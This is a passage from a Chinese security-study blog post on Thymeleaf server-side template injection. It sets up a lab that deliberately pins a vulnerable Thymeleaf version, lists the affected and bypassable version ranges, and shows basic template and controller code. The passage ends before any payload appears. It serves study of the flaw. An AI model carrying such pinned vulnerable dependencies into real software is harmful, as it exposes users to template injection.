<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Web, Security, Web安全, Java, Java安全">
    <meta name="description" content="记录一下我的网安学习">
    <meta name="author" content="1diot9">
    
    <title>
        
            Thymeleaf SSTI |
        
        1diot9&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/baka.png">
    
    
<link rel="stylesheet" href="/font/css/fontawesome.min.css">

    
<link rel="stylesheet" href="/font/css/regular.min.css">

    
<link rel="stylesheet" href="/font/css/solid.min.css">

    
<link rel="stylesheet" href="/font/css/brands.min.css">

    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#CCCCCC","title":"1diot9's Blog","author":"1diot9","avatar":"/images/baka.png","logo":"/images/baka.png","favicon":"/images/baka.png"},"menu":{"home":"/","archives":"/archives","tags":"/tags","categories":"/categories","about":"/about"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"登上山顶的人沉默不语，半途而废者诉说着旅途的艰辛","hitokoto":false},"social_contact":{"enable":true,"links":{"github":"https://www.github.com/1diot9","weixin":"img | /images/weixin.jpg","qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":true,"percent":false,"hide_header":true},"home":{"announcement":null,"category":true,"tag":true,"post_datetime":"updated","post_datetime_format":"YYYY-MM-DD HH:mm:ss"},"post":{"author_badge":{"enable":true,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":true,"min2read":true},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":true,"share":false,"reward":{"enable":false,"img_link":null,"text":null,"icon":null},"img_align":"center"},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"toc":{"enable":true,"number":true,"expand_all":true,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"local_search":{"enable":true,"preload":true},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.39"},"waline":{"server_url":null,"reaction":false,"version":"3.3.2"},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":false},"cdn":{"enable":false,"provider":"cdnjs"},"pjax":{"enable":true},"footer":{"since":2025,"word_count":true,"site_deploy":{"enable":true,"provider":"github","url":null},"record":{"enable":false,"list":[{"code":null,"link":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","source_data":{},"version":"4.2.5"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left flex-start border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/baka.png">
                </a>
            
            <a class="site-name border-box" href="/">
               1diot9&#39;s Blog
            </a>
        </div>

        <div class="right border-box">
            <div class="pc border-box">
                <ul class="menu-list border-box">
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/">
                                
                                首页
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/archives">
                                
                                归档
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/tags">
                                
                                标签
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/categories">
                                
                                分类
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/about">
                                
                                关于
                                
                            </a>
                            
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="menu-text-color fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile border-box flex-start">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list border-box">
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/">
                            
                            首页
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/archives">
                            
                            归档
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/tags">
                            
                            标签
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/categories">
                            
                            分类
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/about">
                            
                            关于
                        </a>
                        
                    </label>
                    
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        Thymeleaf SSTI
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/baka.png">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">1diot9</span>
                                
                                    <span class="author-badge">Lv4</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2025-10-16 11:09:23</span>
            </span>

            
                <span class="meta-info-item post-update-date">
                    <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                    <span class="datetime" data-updated="Tue Oct 21 2025 19:18:39 GMT+0800">2025-10-21 19:18:39</span>
                </span>
            
        

        
            <span class="meta-info-item post-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="post-category-ul">
                    
                            <li class="category-item"><a href="/categories/Java%E5%AE%89%E5%85%A8/">Java安全</a></li>
                        
                    
                </ul>
            </span>
        

        
            <span class="post-tag meta-info-item border-box">
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/Java%E5%AE%89%E5%85%A8/">Java安全</a></li>
                        
                    
                </ul>
            </span>
        

        
        
            <span class="meta-info-item post-wordcount">
                <i class="icon fas fa-file-word"></i>&nbsp;<span>3.7k 字</span>
            </span>
        
        
            <span class="meta-info-item post-min2read">
                <i class="icon fas fa-clock"></i>&nbsp;<span>17 分钟</span>
            </span>
        
        
            <span class="meta-info-item post-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body ">
                    

                    
                         <h1 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h1><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependencies</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.springframework.boot<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>spring-boot-starter-web<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>2.7.15<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.springframework.boot<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>spring-boot-starter-thymeleaf<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>2.2.12.RELEASE<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependencies</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image.png"  alt="img"></p>
<p>对应的版本是3.0.11，而漏洞范围是3.0.0~3.0.11，符合。3.0.12，3.0.13，3.0.14存在绕过。3.0.15彻底修复。</p>
<p>最新的3.1.2存在绕过。</p>
<p>对应版本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">SpringBoot     Thymeleaf</span><br><span class="line">2.2.0.RELEASE  3.0.11</span><br><span class="line">2.4.10         3.0.12</span><br><span class="line">2.7.18         3.0.15</span><br><span class="line">3.0.8          3.1.1</span><br><span class="line">3.2.2          3.1.2</span><br></pre></td></tr></table></figure>



<p>application.yml 主要是设置不缓存，保证html能热加载</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">server:</span></span><br><span class="line">  <span class="attr">port:</span> <span class="number">8084</span></span><br><span class="line"><span class="attr">spring:</span></span><br><span class="line">  <span class="attr">thymeleaf:</span></span><br><span class="line">    <span class="attr">cache:</span> <span class="literal">false</span></span><br></pre></td></tr></table></figure>



<p>另外，讲一下三种依赖的区别，直接搬运：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584217048.png"  alt="img"></p>
<h1 id="基本用法"><a href="#基本用法" class="headerlink" title="基本用法"></a>基本用法</h1><p>HelloController，用于学习基本用法：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.test.controller;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.test.pojo.User;</span><br><span class="line"><span class="keyword">import</span> org.springframework.stereotype.Controller;</span><br><span class="line"><span class="keyword">import</span> org.springframework.ui.Model;</span><br><span class="line"><span class="keyword">import</span> org.springframework.web.bind.annotation.GetMapping;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.util.Date;</span><br><span class="line"></span><br><span class="line"><span class="meta">@Controller</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">HelloController</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@GetMapping(&quot;hello&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">show1</span><span class="params">(Model model)</span> &#123;</span><br><span class="line">        model.addAttribute(<span class="string">&quot;msg&quot;</span>, <span class="string">&quot;Hello World&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;index&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@GetMapping(&quot;add&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">addUser</span><span class="params">(Model model)</span> &#123;</span><br><span class="line">        <span class="type">User</span> <span class="variable">user</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">User</span>();</span><br><span class="line">        user.setAge(<span class="number">20</span>);</span><br><span class="line">        user.setName(<span class="string">&quot;&lt;p&gt;baka123&lt;/p&gt;&quot;</span>);</span><br><span class="line">        model.addAttribute(<span class="string">&quot;user&quot;</span>, user);</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;user&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@GetMapping(&quot;date&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">date</span><span class="params">(Model model)</span>&#123;</span><br><span class="line">        model.addAttribute(<span class="string">&quot;today&quot;</span>, <span class="keyword">new</span> <span class="title class_">Date</span>());</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;date&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@GetMapping(&quot;page&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">page</span><span class="params">(Model model)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;page&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>index.html</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!--把html 的名称空间，改成：xmlns:th=&quot;http://www.thymeleaf.org&quot; 会有语法提示--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span> <span class="attr">xmlns:th</span>=<span class="string">&quot;http://www.thymeleaf.org&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>hello<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">link</span> <span class="attr">rel</span>=<span class="string">&quot;stylesheet&quot;</span> <span class="attr">th:href</span>=<span class="string">&quot;@&#123;app.css&#125;&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!--text: 支持文本替换，若文本包含html字符，则会被转义 &lt;p&gt;你好&lt;/p&gt;将会被格式化输出为$lt;p$gt;你好$lt;/p$lt;--&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">h1</span> <span class="attr">th:text</span>=<span class="string">&quot;$&#123;msg&#125;&quot;</span>&gt;</span>大家好<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">&lt;!--单引号输出字面值--&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">h1</span> <span class="attr">th:text</span>=<span class="string">&quot;&#x27;$&#123;msg&#125;&#x27;&quot;</span>&gt;</span>大家好<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">&quot;app&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>



<p>app.css</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-class">.app</span>&#123;</span><br><span class="line">    <span class="attribute">height</span>: <span class="number">200px</span>;</span><br><span class="line">    <span class="attribute">width</span>: <span class="number">200px</span>;</span><br><span class="line">    <span class="attribute">background-color</span>: darkblue;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>user.html</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!--把html 的名称空间，改成：xmlns:th=&quot;http://www.thymeleaf.org&quot; 会有语法提示--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span> <span class="attr">xmlns:th</span>=<span class="string">&quot;http://www.thymeleaf.org&quot;</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>hello<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">h1</span>&gt;</span></span><br><span class="line">      <span class="comment">&lt;!--utext: 支持html标签的文本替换--&gt;</span></span><br><span class="line">      欢迎您：<span class="tag">&lt;<span class="name">span</span> <span class="attr">th:utext</span>=<span class="string">&quot;$&#123;user.name&#125;&quot;</span>&gt;</span>---<span class="tag">&lt;/<span class="name">span</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">h1</span>&gt;</span></span><br><span class="line">      <span class="comment">&lt;!--|| 避免字符串拼接时写过多单引号和加号--&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">span</span> <span class="attr">th:utext</span>=<span class="string">&quot;|$&#123;user.name&#125;, 你好啊!|&quot;</span>&gt;</span>---<span class="tag">&lt;/<span class="name">span</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">h2</span> <span class="attr">th:object</span>=<span class="string">&quot;$&#123;user&#125;&quot;</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">p</span>&gt;</span>Name: <span class="tag">&lt;<span class="name">span</span> <span class="attr">th:text</span>=<span class="string">&quot;*&#123;name&#125;&quot;</span>&gt;</span>Jack<span class="tag">&lt;/<span class="name">span</span>&gt;</span>.<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">p</span>&gt;</span>Age: <span class="tag">&lt;<span class="name">span</span> <span class="attr">th:text</span>=<span class="string">&quot;*&#123;age&#125;&quot;</span>&gt;</span>21<span class="tag">&lt;/<span class="name">span</span>&gt;</span>.<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">h2</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>



<p>date.html</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span> <span class="attr">xmlns:th</span>=<span class="string">&quot;http://www.thymeleaf.org&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>Title<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">p</span>&gt;</span></span><br><span class="line">        今天是: <span class="tag">&lt;<span class="name">span</span> <span class="attr">th:text</span>=<span class="string">&quot;$&#123;#dates.format(today,&#x27;yyyy-MM-dd&#x27;)&#125;&quot;</span>&gt;</span>2020-03-30<span class="tag">&lt;/<span class="name">span</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>



<p>page.html</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!--把html 的名称空间，改成：`xmlns:th=&quot;http://www.thymeleaf.org&quot;` 会有语法提示--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span> <span class="attr">xmlns:th</span>=<span class="string">&quot;http://www.thymeleaf.org&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>hello<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">link</span> <span class="attr">rel</span>=<span class="string">&quot;stylesheet&quot;</span> <span class="attr">th:href</span>=<span class="string">&quot;@&#123;app.css&#125;&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">&lt;!--注意：在调用fragment时是从Thymeleaf文件的根路径：src/main/resource/templates开始的，如果像读取子路径下的代码块应该配置相应的路径。--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">th:replace</span>=<span class="string">&quot;~&#123;component::com1&#125;&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">&lt;!--保留原来的标签--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">th:insert</span>=<span class="string">&quot;~&#123;component::com2&#125;&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">&lt;!--只需要在公共组件添加一个 id 或 class 等只要css 能唯一定位到的属性即可   (此处以 id 为例)--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">th:insert</span>=<span class="string">&quot;~&#123;component::#com3&#125;&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>



<p>component.html</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span> <span class="attr">xmlns:th</span>=<span class="string">&quot;http://www.thymeleaf.org&quot;</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">th:fragment</span>=<span class="string">&quot;com1&quot;</span>&gt;</span></span><br><span class="line">    111</span><br><span class="line"><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">th:fragment</span>=<span class="string">&quot;com2&quot;</span>&gt;</span></span><br><span class="line">    222</span><br><span class="line"><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">id</span>=<span class="string">&quot;com3&quot;</span>&gt;</span></span><br><span class="line">    333</span><br><span class="line"><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>



<p>大部分的用法我都写在注释里了，这里再总结搬运一下：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584232590.png"  alt="img"></p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584232609.png"  alt="img"></p>
<p>我们在Controller里会有这种写法：</p>
